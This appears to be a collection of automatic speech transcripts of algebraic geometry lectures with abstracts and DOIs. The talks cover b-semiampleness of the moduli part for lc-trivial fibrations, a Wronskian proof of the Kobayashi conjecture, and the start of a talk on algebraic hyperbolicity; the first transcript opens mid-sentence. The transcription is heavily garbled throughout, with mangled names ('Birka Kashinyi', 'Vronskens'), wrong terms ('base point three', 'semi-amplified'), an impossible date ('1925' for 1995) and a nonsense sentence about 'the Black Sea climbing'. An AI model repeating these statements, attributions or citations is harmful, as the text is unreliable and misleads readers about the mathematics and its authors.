time I take another base change, the moduli part, so Mz prime is F, and here Kz prime plus Bz prime. For every other barational map, the moduli part I obtain is just a pullback of Mz prime. So on Z prime, all the properties of M appear. So we say that the canonical bundle formula of F is a way of writing Kx plus B as the pullback of the sum of three divisors. So this is the discriminant which detects the singularities, the canonical bundle and the moduli part which enjoys these positivity properties. But, so maybe more than that, this moduli part is supposed to detect the properties of the fibers in moduli. So whether the fibers vary or not, if they are all, maybe all isomorphic or not. And let me give you the first example of canonical bundle formula for elliptic vibrations. So if F is an elliptic vibration, then there is a theorem by Kodaira and Gueno, maybe like this, saying that 12 times the moduli part is the pullback of a divisor of degree one on P1, where J is the J in the end. So this motivates at least the name, if all the fibers of the elliptic vibrations are isomorphic, this map is constant and therefore MC is trivial. Otherwise, it's sample. Okay. And then, maybe another important motivation, another result by Ambro. If, don't F is a KLT trivial vibration and MC is torsion, then X is a product and F is a projection. So, maybe modulo finite base change. Sorry. So, the first conjecture about the moduli part states that similar property is true all the time. So, the chain state by Prokhorov and Shukurov. And then we should be able to find a vibrational map, rho, and a natural number, such that M times MC prime, so MC prime is the moduli part of the base change, is base point three. And maybe for later, I will add, but I will denote the dependence on K with the conjecture is just for basis of dimension K. Okay. In the triviality theorem? Yes. Yes, there is, but it's KLT. It's not true for LC. So, this conjecture is wide open, is probably very hard. It has been proved in some special cases. The conjecture has been proved. So, maybe if the fibers have dimension one, so by Kudairi Ueno, and by Prokhorov and Shukurov. And for, well, if the fibers have dimension two, but are not P2, this is by Fugino, and there are some results by Shilipatsi. And if the fibers are a billion varieties, let's see again by Fugino. And now some of these results, everything apart from some of the two dimensional fiber cases, use the existence of some moduli spaces for the fibers. And there is another result, which is when mz is numerically zero. So, I just remind that mz numerically zero means that mz has zero intersection with every curve in z. And so, this is a result by Ambrov for KLT. And I proved it for LC. So, if mz is numerically zero, then it is a torsion divisor. The immediate corollary of this result is that the conjecture is true when the base has dimension one. Okay, now I've given all the important definition and some of the results. And then I can state what we proved with Vladimir Lavzic. So, I'll state the theorem in two parts. The first one is that it is enough to prove the conjecture when the moduli part is big. The second part is that the divisor is big if it's the sum of an ample and an effective divisor. And then the second part, so we assume the conjecture in dimension k minus one. And then for all sub-variate of z of k dimension one, we can prove that the restriction, um, I didn't tell you, is b semi-ample. So, what does b semi-ample mean? So, these two lines are called b semi-ample. And b stands for barational and the existence of m such that this multiple of m z prime is, is base point three is the semi-ampleness. Is it supposed to hold for every umbral model? Yeah, yeah. Yeah, no, you're right. So, we can say that z prime dominates an umbral model or one can also prove that, well, let's say, and z prime is, uh, as in the theorem. As in the theorem by Ambro, Cavamata, Collar, and Ginagobio. And then we can say that the semi-ampleness is proved not on any model, but on the one where all the important information is. Thank you. Thank you. Okay. No. Okay. I have to say something about motivation. So, the first, the first type of motivation I would like to give is more technical with respect to the result. So, the corollary, maybe of the methods more than of the result, we obtained the following. So, we assume the conjecture in dimension minus two. And I, now it's far away, but I didn't write it, but in the, in the statement, I'm assuming that the base of my L C trivial vibration has dimension K. I apologize. I hope it's clear from the contest that so T has dimension K minus one. We assume that the conjecture in for basis of dimension came and is to, and then we have F. We dimension of K of Z equal to K. And then I assume that MZ is big and the support of the discriminant, the discriminant with the augmented base locus of MZ. I'll tell you in a second what it is. Is simple normal crossing. And for every component of these, could I mention one locus. The restriction of MZ is semi ample. And this is the reminder. The plus of a big divisor is, so it is the locus where MZ is not ample. And it is defined as the intersection of all the supports of the effective divisors, such that MZ can be written as the sum of an ample plus that effective. And this guy contains the base locus of MZ. The base locus is the locus where MZ is not semi ample. So this result can be seen as an exploration of the base locus of MZ, the behavior of the moduli part along the base locus. Okay, so this is the first motivation, but maybe more importantly. So these maybe motivations to study the conjecture more than this exact result. So if we have a pair, the object canonically attached to it is kx plus b. So if we want to study the pair, we try to take this object and squeeze as much information as we can from it. So the first thing to do is look at the global sections and its multiples. And they, so if we take all the spaces of global sections, then they form a ring called the canonical ring. And now. And one of the most important questions is about finite generation of this canonical ring. And finite generation has been proved in famous paper by Birka Kashinyi, Heikana McKernan in the KLT case. And the first of all question is are the VIXB finite-generation. And some important answers have been given by Birka Kashinyi, Heikana McKernan if VIXB is KLT and K plus V is big. So then yes. And using this result, there is a theorem by Fugina and Mori. So again, if VIXB is KLT, then same conclusion holds. In this theorem, the authors use the result by Birka Kashinyi, Heikana McKernan and the canonical bundle formula. And it turns out for a lot of difficult questions, the LC case is very important. And in order to try to reproduce their strategy in the LC case, this conjecture could be really useful. So this is a reason for the importance of the B semi-ampleness conjecture. So I've got 15 minutes. So now I have a bit of time left. I can give you some ideas from the proof. So we will just, let's say, treat a baby case. I will assume that mz is big and that the dimension of z is 2. And there is a theorem by, and I also assume that z is z prime. It's a model where mz is nf and for whatever other variational map, I just obtain the pool depth every time. And there is a theorem by Nakamaya that says that the B plus, that implies that the B plus of mz is the union of all the curves which have zero intersection with mz. So I will prove, I will tell you how to prove our result for a component of the B plus in dimension 2 for mz big. And I also assume that, so just recall that we have f from x, B to z. I will also assume that the preimage of t, which I call xt is smooth. This was, of course, it's not always true, but at least it will make the proof a little easier to follow. So we write our canonical bundle formula for f. And I can add xt on the right side and on the left side. I use the junction formula. And we obtain that kxt plus the restriction of B to xt is the pullback of kt plus, plus the restriction of the divisors. So in particular, this proves that the restriction is an ac trivial vibration. So this is a canonical bundle formula. We write the canonical bundle formula and maybe the discriminant and the moduli part are different. Sorry,yes,謝謝. Have you checked the comparison? Sure, I am, you're right. I'm assuming for simplicity also that gamma p is one, gamma t, sorry, is one. Yeah, thanks. Yeah, it's not in general, of course. Okay. So we have this pullback and the canonical bundle formula. And then there is something I will not prove, but I will just let me just state as log n. So this log n is that the restricted vibration is more singular. Then the, then the vibration we start with. So of course, this sentence has to be proved, but this implies that the discriminant of the restriction of the vibration is bigger or equal than the restriction of the discriminant. Oops. But then we have the opposite inequality for the modular parts. Okay. But now, how did we choose t? T is a component of the B plus of the vibration. So this one is numerically zero. And t is a curve. So this one is an f. So these two properties with the inequality imply that n t equals m zero strictly to t. And maybe it's still on the blackboard. Yes. So up there, you can see that the conjecture has been proved if the dimension of the base is one. So this guy is semi-amplified because this one is. And so this concludes the proof of this baby case. So of course, in general, all the hypotheses I've made are not true. And so one has to, for instance, the suitable multiple of x t here, if gamma t is different than one in order to obtain everywhere as c pairs. And if this guy is not smooth, there is a sub-adjunction argument. And also this very vague sentence has to be proved with an MMP technique, which we took, we changed it a little bit, but it's very much inspired by a paper of Fugino and Gongyop. And we'll stop here. Thank you for your attention. Thank you.
|
An lc-trivial fibration $f : (X, B) \to Y$ is a fibration such that the log-canonical divisor of the pair $(X, B)$ is trivial along the fibres of $f$. As in the case of the canonical bundle formula for elliptic fibrations, the log-canonical divisor can be written as the sum of the pullback of three divisors: the canonical divisor of $Y$; a divisor, called discriminant, which contains informations on the singular fibres; a divisor, called moduli part, that contains informations on the variation in moduli of the fibres. The moduli part is conjectured to be semiample. Ambro proved the conjecture when the base $Y$ is a curve. In this talk we will explain how to prove that the restriction of the moduli part to a hypersurface is semiample assuming the conjecture in lower dimension.
|
10.5446/53782 (DOI)
|
Thank you very much. So first I would like to thank the organizers for another opportunity to explain things that I work with in mathematics. So I'm going to discuss essentially the Kobayashi conductor, which is now no longer a conductor but a theorem, although there are still many things to be improved and to still develop further. So the setting is a study of projective algebraic varieties over complex numbers. And one considers entire curves. So an entire curve is just a homomorphic map from the complex line into x, that is homomorphic and non-constant. And by definition, x is said to be broadly hyperbolic if there are no such entire curves. It is well known because x is compact that broad-y hyperbolicity is equivalent to Kobayashi hyperbolicity in the sense of Kobayashi metric. Now the Kobayashi conductor, which goes back to the 70s, is that if you take x of dimension n, the hyper surface in complex projective space of degree d, then there should exist dn, depending on dimension, such that for x general, meaning a point in a Zarisky open set in the parameter space of hyper surfaces, and degree d, at least dn, then x should be hyperbolic in either sense. So what are the expectations for this dn? Well in fact, there is a very strong essentially unfold conjecture at this point, which is called the Green-Grafie-Slang conjecture, which tells that if x is of general type, in the sense that the chemical bundle is big, then there should exist a proper algebraic subvariety meaning all the entire curves. And in fact, it is expected that these are equivalent. And if the conjecture is settled, then you can apply well-known results of Clemens, Clair-Roisin, and the Chien-Zah, and Ein. Then in fact, using these results, you can convert the problem into a purely algebraic characterization. So you would have the following characterization of hyperbolicity for projective varieties. So x would be Kobayashi hyperbolic, if and only if for every algebraic subvariety in x, then y is of general type. So this is an immediate consequence of the Green-Grafie-Slang conjecture as stated above. Because this condition has been solved, it's purely algebraic by Clemens, Ein, Ruisin, and Chien-Zah, and we know when a general hyper surface satisfies this, and it follows that you can take in fact D1 to be 4, so curves of degree 4 are in the plane are hyperbolic. Dn would be 2n plus 1 for n between 2 and 4, and you would have dn equal 2n for n at least 5. This bounce would be optimal. For maybe very general, for low. But as you will see, for general, it's enough if the degree is not enough. But there is maybe some range for very low degrees where you might need very general. If you are very optimistic, maybe general is enough. I tend to be optimistic. Okay. So now let me come to what is known. So proof of the Kobayashi conjecture. So I should say proofs. There are several proofs now. My goal today is to try to explain a proof that is as simple as possible. I will try to give all arguments. And so, well, the first attempts of proofs were by Sue and gave a lot of arguments already the early 2002 at the Abel conference. And then, well, the paper was finally published in the Inventionist Math in 2015. And the paper is rather long and difficult, and it's using a lot of Nivellina theory. Plus, a lot of things also related to jet, the differentials and such ideas. And then a more geometric proof was found by Damien Brotbeck more recently, 2016. So a shorter, shorter and more geometric proof, which I will essentially explain now. It's a variation of Damien's proof that I will explain, but I think a little bit simpler. In these two first proofs, there were no estimates of DN. So just existence of DN, but unspecified. So it turns out that the proof by Damien Brotbeck can be made effective. Then Yadang, very shortly after the paper of Brotbeck was posted on archive, turned the proof into an effective version, and got values of DN, which was stated to be N plus 1 to the N plus 2 multiplied by N plus 2 to N plus 7, which is roughly something like N to the 3 N plus 9. But it turns out that, in fact, by the same proof, the same proof, you can improve a little bit to N to the 2N plus 4, essentially, something like this. Maybe a slightly more than this, but. The proof is based also on ideas that led to a solution of the De Barck conductor. And now I will present another variation of the argument, so a simpler variation, even simpler, I believe, with a bound that is possibly the same size, well, a little bit bigger, with a bound that is like E N, E is exponential 1 to the 2N plus 2. Well, something like this. But my guess is that you can still improve to better. I still don't know exactly what you can reach with this method, but it's only a little bit less. OK, so what is the basic idea? So the idea is that entire curves have to satisfy many differential equations, ODEs. These ODEs, I will write in the form P over 0, where P is an algebraic differential operator of the form sum of some coefficients, a alpha of f multiplied by a polynomial in the derivatives. So you have the first derivative raised to some exponent, second derivative to some exponent 2, et cetera, up to the case derivative to some exponent. And then you count the weighted degree. And the weighted degree is alpha 1 plus 2 alpha 2 plus k times the length of alpha k. So these are multi-indices. So it means polynomials here, of course, you write f locally as an n-tuple. And these are actually monomials in the components. And a alpha are just locally holomorphic coefficients on the ambient manifold x. Of course, if you're on x-projective and you have a global thing, it's going to be algebraic. OK, so now you have a further condition, which is that you want equations that depend only on the geometry on the curve and not on the parameterization of the curve. So if you want, if you reparametrize, OK, so you have your curve here. But then you reparametrize by composing by, say, an entire function from c to c. OK, so you replace your curve by f composed with phi. Why not necessarily a, of course, bijection of c, because you don't have many, but any entire map. And then you want the condition that p of f composed with phi is the derivative phi prime to the m times p of f composed with phi. And these are the so-called invariant polynomial differential operators. And these describe the geometry of the curve and not the way the curve is parameterized. OK, now if you look at the coefficients, well, this is like, these are linear conditions on the coefficients. And it describes a bundle. So you introduce the bundle, which I will denote by e k m t star x, well, because somehow there are tensors in the tangent bundle of invariant algebraic differential operators. And now to get these ODEs, you use the fundamental vanishing theorem. Actually, it was stated, well, it goes back to block already in 1926 in some way, but general form was stated by Green Griffiths and then proved the complete proof was given by Sue and Young. So I wrote proof 95, somewhat different. The statement is that for every x, productive algebraic, for every anti-curve, c to x, and for every global differential operator. But then you have to take an operator that is zero on some ample divisor. So you should twist by O of minus a with a ample. So for every a ample line bundle, then if you take this data, then automatically p of f is zero. OK, so if you happen to be able to construct. So you want to construct such operators. So now the problem is that you want to construct any sections in this bundle. So meaning such operators such that the coefficients a, alpha vanish along a. OK, if you have such sections, automatically you get that the entire curves are solutions of a lot of differential equations. If there are enough differential equations, then possibly you can exclude the existence of entire curves. The question of base law. Now you need the base law course and you have to study the base law course. OK, so. Of course, you have one reason to be optimistic. Especially in view of proving the Green-Gryff-Langue conductor, well, if you are extremely optimistic, it's that this space is actually nonzero and big if x is of general type. So theorem I proved in 2010 appeared in 2011. So if x is of general type, then, well, this has a lot of sections. So the number here grows as fast as possible. This is large and as large as possible as possible if m is large compared to k and k is large. You can specify what you mean by large in terms of safe trend classes. This can be computed. OK, but they exist, but you don't have much control on them and you don't have much control on the base law course. That's the main problem. But now there are easier ways and this is what I'm going to concentrate on. You have simple sections that are provided by Vronskens. And this was used in an essential way by Damien Brotbeck, also by other people. It goes back actually to Carton, a lot of work before. So suppose you take sections of some L. So L is some auxiliary line bundle. And then you define a Vronskens operator, so one of those differential operators, W as 0, S1, SK, acting on F. So you take the determinant of the derivatives of the sections as J, composed with a curve, F. And you need a square matrix. So you take I and J between 0 and K. So it's a K plus 1, K plus 1 determinant. In fact, you can take, well, it's not needed necessarily that you take global sections. So you can take sections on some open set. So U, some open set in X. And then if you do this, you actually get a differential operator for the Vronskens associated with S0, S1, SK, which you have to accommodate according to this notation. So it is of order K in the sense that it operates with derivatives up to order K, and not more. And the total degree, you take, for instance, the first diagonal. So you have the degree as the number of primes involved in the monomials, so the M here. So it's easy to see that for a Vronskens, it's KK plus 1 divided by 2. It's the 1 plus 2 plus K. So you get, and now it, of course, defined only over U. So in Broadbeck's notation, K prime means K plus 1 divided by 2. But then it's not scalar valued. It's not scalar valued because, well, you have an easy formula for Vronskens. If you multiply the sections by a function, then G is involved with the power K plus 1 in the Vronskens. So you have this formula, which actually tells you that although you have to compute this in terms of coordinates, possibly, actually, the formula will be independent of coordinates. But it will tell you that, actually, it gets its values in L to the K plus 1. So it's not scalar valued, but it's with values in the K plus 1 power of the auxiliary line bundle L. And of course, if you take U to be X, you do get a global section. But unfortunately, you are likely to get sections, global sections, only if you take L to be positive, say, ample. And then the power that you get here will be also ample, which does not fit with the vanishing theorem because you need negative here. So the only thing that you can do, so the next idea is to try to simplify the Vronskens by a large factor to make it a section with negative exponent here. So you want a big simplification. You want to divide the Vronskens by something big to convert this positive thing into a negative thing. So you want to divide Vronskens or to simplify, if possible, Vronskens by a large factor. So let me first give you an easy example, which is the case of the Fermat hyper surface. So maybe here. So you take the Fermat hyper surface of degree D, say, Z0 to the D plus Z1 to the D. So here you have a hyper surface in complex protective space of dimension capital N. And of course you get that X, which is of dimension small n capital N minus 1. And you're going to take a Vronskens, which is associated to the monomials here. But instead of going to the last one, you stop at Zn minus 1, which I denote Zk. So I'm taking here k equal to n minus 1. So you also take capital N minus 1. OK, so this is just the determinant of the derivatives of, well, the components of the curve in homogeneous coordinates raised to power D. But of course you take derivatives up to order k at most. So if D is large, this is divisible by Fj to the D minus k. So this is divisible. But in fact, as a section, it is divisible by the equations of the divisor. Because now you, of course, you look at the coefficients of the Vronskens operator in terms of the Zs. And then it's divisible by the product from j equal to 0 to k of Zj to the D minus k. So now let's count what's left. So what's left, of course, then you divide. So 1 over product to k of Zj to the D minus k times this Vronskin. OK, and then you get something in H0 of x e k k prime. Well k is capital N minus 1. It's Rx, tensor LL here, L is just O of 1. OK, and then I have a factor k plus 1 D. But then I subtract k plus 1 times D minus k. So I am left with O of k plus 1. Unfortunately it's still not negative. But at least independent of D. So you can take the degree arbitrarily large and the exponent doesn't grow with the degree. So if you are capable of finding just one extra factor, if you would be able to have to add just one extra factor in the division, well D is very large, since this does not depend on D, after dividing with this extra factor you win. But here you win because of the relation, the last one I've stopped at Zn minus 1 here. I've stopped at Zn minus 1. But I can replace, I can replace say Z0 to the D by minus Z1 to the D plus Zn to the D. And now in the Vronskian starting with C0 to the D, replacing the Z0 to the D and using the linearity of the Vronskian. And then I get minus, well all the other terms will vanish because they also appear here. So I get minus W Z capital N to the D and then Z1 to the D and then Zn Zk which is the same as Zn minus 1. So it's also divisible by the extra factor Zn to the D minus k. And then after this extra division now I get k plus 2 here and then I get this minus D minus k. And now I win if D, so success if D is larger than k, k plus 2 and therefore D equal k plus 1 square is enough. And k plus 1 square is just capital N square. This is, this is, there's been standard for a lot of time, well except that it was possibly not stated this way but there's been a lot of proofs especially in Japan exploiting this property. It's been worked especially by Tudor Noguchi trying to find explicit examples of hyperbolic hyper surfaces with explicit coefficients and trying to improve the degrees. And then one of the, well work with good degree and actually this degree, well what you do is, of course the thermal hyper surface is not hyperbolic because the thermal hyper surface contains a lot of rational curves. So you cannot expect the thermal to be hyperbolic but what you can expect is to take this thermal which is of dimension x minus 1, okay, in P and N, the thermal, thermal of degree D larger than N square. And then you cut by, you cut by a generic N plus 1 projective linear subspace, say V, V is a general linear productive subspace. And then it turns out that you can eliminate and you can essentially proceed by induction in that way and you have a very cheap way and this was actually done by a Schiffman and Seidtenberg. Sorry, V is a projective hyper plate or? Not a hyper plate. You cut, this is co-dimension 1 in PN. So if you cut with a linear PN plus 1, you are going to get something that is N dimensional. So this is a hyper surface, so this is a hyper surface in V, okay, but V is isomorphic to PN plus 1. Excuse me, because N plus 1, small N plus 1 is capital N, so I was confused here. It's not the same. Not the same anymore. Not the same anymore. Okay, N prime, okay. Well, no, this was N at this time but now I'm changing my small N. So now my small N has nothing to do with capital N. It's smaller than capital N. In fact, you have to take roughly the half of capital N. So you take N to be, well, the integer part of N divided by 2 and this is enough to kill the rational curves that contain the thermal hyper surface and then you easily see, and this was proved by Schiffmann's idea that this is actually hyperbolic. So this is going to be hyperbolic for V general. And then you get the very low degree example, which is D equal capital N square, but capital N is roughly 2N, so this is like 4N square. So you get an example of algebraic hyper surface that is hyperbolic of degree N square, well, 4N square. But unfortunately, this is general in the family of linear intersections but not in the family of hyper surfaces. So unfortunately, this construction that is very simple is not enough to prove the generacity of hyperbolicity in the Kobayashi contractor. In fact, the reason is that we have some sort of very exceptional geometry here and we can argue with only one Varen scale. But to proceed further, we need more Varen scales. Well, at least it's a possibility that we have more Varen scales that have this division property. So we need more Varen scales. So we need more Varen scales with the divisibility property. And actually, I'm going to prove the following theorem along these lines. Well, it should be attributed to, well, the community rather than to me. I wrote the details but the ideas were already there. So you take XZ, sorry, Z to be N plus 1 productive variety. So you're taking hyper surface not just in productive space but in arbitrary productive variety. OK. And A very ample. And Z. And now you take a section of degree D with respect to A on Z. And D is larger than, well, the number I gave you, EN to the 2N plus 2. Well you can prove a little bit. A general section. Then the hyper surface, which is just the zero divisor of sigma, of course, smooth because A is very ample, is going to be a Kobayashi hyperbolic. OK and how will you prove that? Well, you're going to specify a very good choice of section sigma zero that has a lot of Varen scales. So you're going to find a very good sigma zero for which you have a lot of Varen scales. For which X0 has many Varen scales. But I have to explain what I mean by many. OK. So it turns out that in fact you have a general construction of what are called sample bundles. So I'm not going to define them. There are some jet differential bundles. Due to the British mathematician sample in the 50s, in the context of hyperbolicity, I realized in the 90s that they were very useful. And so you have a tower. X0 is just a given. It's a given X. And then you have the tower. And the tower is a tower of P and minus one bundles. And actually it's the projectivization of a vector bundle in each step. So on XK minus one you have a vector bundle. And if you take the P of this vector bundle you get XK. OK. I will not repeat the construction. But because it's a projectivization, each of them carries a tautological line bundle. And similarly you have a line bundle over X1 of 1, et cetera. And then it turns out that the bundle I've explained, ekm t star x, is just the direct image of the m's power of this line bundle on X. So let me denote by pi K the projection from XK to X0. Take the direct image of OXK of m. Well this is established in my Santa Cruz notes 95. And well there were a lot of work also at the same time by other people. Although it was done independently. And now of course you can look at the local Vronskens. So you look at the local Vronskens. And by this I mean that you take sections say, well in the trivial, you take sections as 0, SK in some neighborhood of a point in OX. Just homomorphic functions. But of course they exist only locally on the small neighborhood of a given point say at 0 in X. And then you can construct sections of OXK of K prime associated with these. So you get the local Vronskens, they are only local. And by pulling back they correspond to sections of OXK of X prime. So you get local sections of OXK of X prime, K prime sorry, on 5K minus 1 of U. And it turns out that this bundle is not relatively generated by sections. It's only relatively big. And there is a universal ideal sheaf. In fact you have a base locus of all the local Vronskens. Of course you have infinitely many such functions. You take a stone, the ball say, take you ball. But even though you have an enormous amount of functions on the ball, these Vronskens still do not generate the bundle OXK of one along the fibers. And they generate in fact OXK of K prime. K prime is K, K plus 1 over 2, twisted by some universal ideal sheaf. Say IK, it's an ideal sheaf. Whenever you take a Vronskens anyway, along the fibers it's going to vanish according to this ideal. You cannot do better. This is the largest possible ideal that you get with Vronskens. There's no way you can get something that does not vanish. That being said Top Vrons on this model of the Black Sea climbing we've done a complete So IK will be called the Vronskin ideal. Of order K. And by general principles, of course, you can blow up this ideal and you get a universal modification of the simple bundle. So you get, you make it invertible. You have a longer resolution. So it's just a modification. And by blowing up the Vronskin ideal. Okay. And now if you say, you know, by new K, this modification map. Now if you pull back. Well, you don't need it. You don't need it to be smooth. So just take the blow. It's enough. If you wanted to be smooth, you can proceed further and probably there is a universal way of making it smooth. So you have some sort of explicit your own, I cut the singleization that is probably better. It's a very interesting question to actually understand better the structure of this Vronskin ideal. It's not completely obvious. And probably there is a better way of this singularizing on the other blow up. Most probably the blow up is not always smooth. I don't know exactly. It's complicated when case large, you can compute for case three or four, but then it becomes difficult. Okay. Well, I just take the blocks. It's enough. So at Sk hat, maybe non, non maybe singular. But then, of course, the full back by construction now becomes an invertible sheaf and therefore is a line bundle. Okay. And now I can tell you what I mean by having many sections. It's erased. Yeah. Yeah. Yeah, many bronze cans. So many bronze cans mean that you have enough bronze cans to generate this line bundle after you go to the blow up. So now many here means that bronze cans will generate. Okay. Global. Not not just of course by definition of the bronze can locally of course the bronze can generate this ideal. This is the definition of the ideal. But I mean global bronze cans after you divide the global divided bronze, not after division with negative powers with that you can divide bronze cans so that they still have negative powers of the of the ampoline. And now I tell you what is the choice the choice of the special as Sigma zero here. Well, so you you define J to be a subset of some set and M of certain Cardinal C. To each of these you associate a section to J, which belongs to H zero of X a. No, sorry, it's capital. Okay. So now you define a monomial. So this this you view as a well if you're of course if you're sorry, so you can think that Z is productive space like P N. This is just a hyperplane. Okay, so you're you're taking a hyperplane. So it's a it's a linear function. Okay, so it's a linear function. So then to J is a linear function. And then you consider a monomial. A monomial. It's the product for all capital J containing small J of this hyperplane. So it's a product of linear things. So J is between zero and capital N. And now you take Sigma zero and you have a sum of M a J M J power Delta. Of course this this has degree is C. Okay, okay, because J is length C. So this degree of M J C. So this is degree C Delta. So this is something that completes to any degree. So you're going to take a J to be H zero X a say to the row. And then the total degree, total degree of Sigma zero is row plus C Delta. So you're going to take in fact, well, in fact, you're going to take C equal to small n the dimension that you want. And you're going to take Delta which is roughly D over over N the C is roughly and row is going to be small, but still much bigger than N. So the row is going to be like N Q. Approximately. And of course D is going to be very, very large the D is like, as I said, like into the two or more to n plus two something like this. So D is definitely very large. Delta is very large. And row is just in between. Okay. So now what happens is that you consider the Brown's kids and I have to stop in one one or two minutes. Even to your. Brown's kids you consider. Well, you take you take these monomials so these monomials that go to from zero to capital N and capital N I've not said that's roughly the same as. No, capital N. Choice will be an N plus equal. You have to experiment the numbers so that all conditions are met. So capital N is roughly N square. Well, of course, you make take different choices, but the, I mean, then it's a matter of technology to see whether it improves or not the degrees but this choice this choice is lead more or less to the bounds I've given. Maybe you can improve. So you take the graph, these choices and then you take you take the bronze kids in the monomials except some of them. So you take the monomials here. But for J in the complement of some capital J, which is of lengths. See which have taken to be. You don't take all of them. And then, since you are missing, you are missing some members because you don't take all of them, you complete here by random stuff, essentially, except that you want a large, a large divisibility. You complete with random stuff here just to have the correct number. The correct number is K is roughly K is roughly the same as row and Q is roughly take this. So you put random stuff in the form some coefficients B, B, L times you take a linear form. And to delta minus to D minus row. And you take something like this so that you can divide also those terms you want to simplify also the random stuff. But but the linear forms here are completely different from the equation something that you can divide but you don't care about. And now what happens is that even though in the Fermat case, you would put all the monomials except one. Here you put all the monomials except C. But it still works because the monomials by construction share some factors. So if you have a C monomials, they share a factor. Although you don't have all of them, the ones that are missing share a factor. So you have the divisibility essentially you have the divisibility by all these delta minus K and all this D minus row minus K. But you also take the linear combination of those which are missing. So those which are missing, they still share a common factor. In fact, you you gain this extra factor that is needed to get a negative exponent. But then you do have many wrong skills. You do have many wrong skills because you can choose randomly any subset J of length C, which means a lot of wrong skills. If you compute well, then you have to check that if you take the now you take you take this coefficients to be random to be general, then the condition that you generate LK is satisfied. But this depends on an analysis of dimension of the base locus. It's just linear algebra of wrong skills. Okay, so it's not not a big deal. Well, you have to compute. So you have a lot of wrong skills. You do some linear algebra you compute the base locus. And it turns out that this condition is satisfied. So this is the proof. Just a last word in a couple of seconds. So to improve on the bounds so to get better than end to the end. So one has to replace run skins by more sophisticated elements in the bundles EKM. And you have to understand better the geometry of this EKM. And I made an attempt in 2015 and even posted a paper to archive which I should probably remove or at least I should tell people that there's something wrong in it. So although I do believe that most of it is correct, well, 99 is correct, but there's one wrong lemma. My hope is that this wrong lemma can be replaced by a more sophisticated lemma which is weaker but still sufficient. And that's all about selecting more sophisticated sections in a very geometric way in the sample towers. So it's a call to young people or others to try to fix that lemma which is exactly lemma 5.1.18 in my 2015 paper. Okay, I'll stop there. Thank you very much. Do you have any questions or remarks, comments, ETS, please wait because that's a microphone. I think I missed the one step in the proof as far as understood you construct some examples of hyperbolic, hyperbolic, hyper surface, but why the general one is also hyperbolic. Yeah, I should have explained that in your, it's a very good question to complete what I've said. Once you get a bundle which I denoted by LK here, which is generated by sections. It is of course, NIF. And then it turns out that the OXK of one is relatively big and by a very easy lemma you can twist by OXK of Epsilon at each levels to make it actually relatively ample. But then a bundle, a Q line bundle being ample is a Zariski open condition. So once you have an example, so going from NIF to ample, this is a matter of a small perturbation of coefficients. And once it is ample, this is a Zariski open condition in the space of parameters. So although you've given only one example, you know that the general member is going to be to have a corresponding bundle that is ample. And you use the theory of dead burnals. The ampereness of this line bundle will imply a Kabeashheb policy by my Santa Cruz notes of 1925. Other questions? Wait, wait. Then it implies that the existence of a smooth Kabeashheb hypersonic hypersurface with rational questions. Yeah, so then, of course, yeah, you are one of the experts of this. So it would be very interesting to specify a say one hypersurface with integer coefficients that is known to be hyperbolic. I guess that from the proof you can extract such an example by looking at heights of coefficients and so on, but you are going to get huge, huge bounce. So getting a nice example is going to be challenging. But I guess you can extract from the proof if you are extremely careful, it's going to be terrible to do. But I'm sure it can be done. The proof will give it, but not in a not very nice way, probably. Questions? So now there is a 13 minutes coffee break.
|
We will discuss several new ideas that can show the existence of jet differential operators on arbitrary projective varieties, and also on general hypersurfaces of $\mathbb{P}^n$ of sufficiently high degree. These results can be applied to improve degree bounds in several hyperbolicity problems and especially in the proof of the Kobayashi conjecture.
|
10.5446/53784 (DOI)
|
I want to thank the organizers for inviting me. It's wonderful to be here and I'm very excited to speak. So I have two goals with my talk today. I want to tell you first goal is I want to tell you about a new technique that I've used in the towards the Kobayashi conjecture and then on other problems about hyper surfaces and projective space. And I think it's likely I hope that it will be useful in your problems too. In future it's quite a general technique and so I hope to show you how it works and hopefully someone here or someone somewhere else can can use it to solve a new problem. And the second part is it's a bit of a call to arms. This technique it reduces the Kobayashi conjecture, roughly it reduces the Kobayashi conjecture, the Green Griffith line conjecture and so it's like come on let's go after the Green Griffith line conjecture. And so there will be some overlap with my introduction with Jean-Pierre's but I think better to say it twice than to accidentally miss something and some of our notation is slightly different. So let's let X be a complex variety. Next time I try to use the Green Griffith line conjecture to the Kobayashi conjecture. Maybe it will be easier. And let's define it. So an entire curve is a non-constant holomorphic map from C. And we say that X is Brody hyperbolic if it contains no entire curves. And then here X is algebraically hyperbolic. And roughly speaking large degree curves have to have high genus so if there is some epsilon greater than zero such that for all C and X an algebraic curve and then 2G minus 2 is at least epsilon times the degree of C where the degree is defined with respect to some polarization. And so now I have a conjecture I would like to attribute to Demae but I should double check with it. It's someone's conjecture and I think it's, oh I should write it before I ask you if it's yours. So the conjecture is that X is algebraically hyperbolic if and only if X is hyperbolic. Is that fair? Maybe it was done by other people before but I stated it myself. Excellent, excellent. Good, good, good. So I'm safe. And so Jean-Pierre proved this direction. So if you're hyperbolic then it's known that you are algebraically hyperbolic and it's expected slash hoped that algebraically hyperbolic implies hyperbolic. I want to talk about one other general, well I have several conjectures but I want to mention the green Griffiths line conjecture which I'll abbreviate GGL. So if X is general type then there's some sub- variety, a proper sub- variety V and X that contains all the entire curves. So I love hyper surfaces and so for the rest of the talk I'm going to focus in on the case of hyper surfaces. And so I'm going to set notation here once and for all. Let X be the vanishing set of a polynomial F in PN and X will have degree D and let's let it be very general which means in the moduli space of hyper surfaces it's the complement of accountable union of sub- varieties. A lot of what I say could work for general too but it's too, I find it too annoying to have to switch between general and very general and we're, and then so here in the case of hyper surfaces general type is equivalent to D being at least N plus 2. So general type, so when I say general type that's what I mean. And so the Kobayashi conjecture here says that if D is at least N plus 2, sorry, the green griffin line conjecture here says that D is at least N plus 2 and X is a smooth hyper surface and so certainly for a very general one then there's some proper sub- variety that contains all the entire curves. There's a stronger conjecture called the Kobayashi conjecture. I'm going to abbreviate it conjecture K and it says, so this is slightly different from what Jean-Pierre said but it's certainly in the same spirit. So I'm calling the Kobayashi conjecture that D is at least 2N plus 1 and X is hyperbolic so I'm calling the conjecture like the strong bound. And so there's some dispute about exactly what the right bound should be and some, particularly this constant here, there's some disagreement or kerfuffle about exactly the right one. I want to talk about evidence for the, so I'm going to present evidence for this bound. You might argue that you could, you should be able to do a 2N minus 2 for very large N and I don't have any evidence for that. So remember we expect you to be hyperbolic if you're algebraically hyperbolic. So we, so like Jean-Pierre was saying, we should think about when are you algebraically hyperbolic and a lot of the same results he mentioned prove algebraic hyperbolicity. So oops, so X is algebraically hyperbolic. So if D is at least 2N, this is a result, this follows from work of I'm and then if D is at least 2N minus 1 and N is at least 4, this follows from work of Oizon and then also, and 